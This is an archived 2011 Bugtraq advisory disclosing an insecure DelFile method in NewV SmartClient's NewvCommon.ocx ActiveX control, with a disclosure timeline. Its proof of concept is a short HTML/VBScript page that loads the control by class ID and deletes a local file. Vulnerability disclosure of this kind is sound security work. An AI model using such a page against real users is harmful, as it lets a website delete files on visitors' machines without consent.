[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

NewvCommon.ocx ActiveX Insecure Method Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: NewvCommon.ocx ActiveX Insecure Method Vulnerability
From: wsn1983@xxxxxxxxx
Date: 10 Jan 2011 14:27:48 -0000

NewvCommon.ocx ActiveX Insecure Method Vulnerability
========
Vulnerable:All Version
Vendor:www.newv.com.cn


Details:
========
A Insecure method vulnerability has been found in NewV SmartClient. 
The specific flaw exists within the DelFile method of the Newv ActiveX control 
(NewvCommon.ocx).
The DelFile method does not handle user's input exactly that can be used to 
delete arbitrary files on users system.


POC: 
========
Function DelFile (
        ByVal FilePath  As Variant 
)  As String


<html>
<head>
<script language='vbscript'>
arg1 = "c:\\test.txt"
</script>
</head>
<object classid='clsid:0B68B7EB-02FF-4A41-BC14-3C303BB853F9' id='target' />
</object>
<script language='vbscript'>
target.DelFile arg1 
</script>
</html>


Timeline:
========
2010.10.23   Report to vendor,no response.
2011.01.10   Public



Reference:
========
http://www.newv.com.cn
http://demo.newv.com.cn/lds/module/smartclientsetting.exe
http://www.nansec.com

Prev by Date: NewV: NewvCommon.ocx arbitrary command execution via the Runcommand attribute
Next by Date: NewvCommon.ocx ActiveX Remote Code Execution Vulnerability
Previous by thread: NewV: NewvCommon.ocx arbitrary command execution via the Runcommand attribute
Next by thread: NewvCommon.ocx ActiveX Remote Code Execution Vulnerability
Index(es):
- Date
- Thread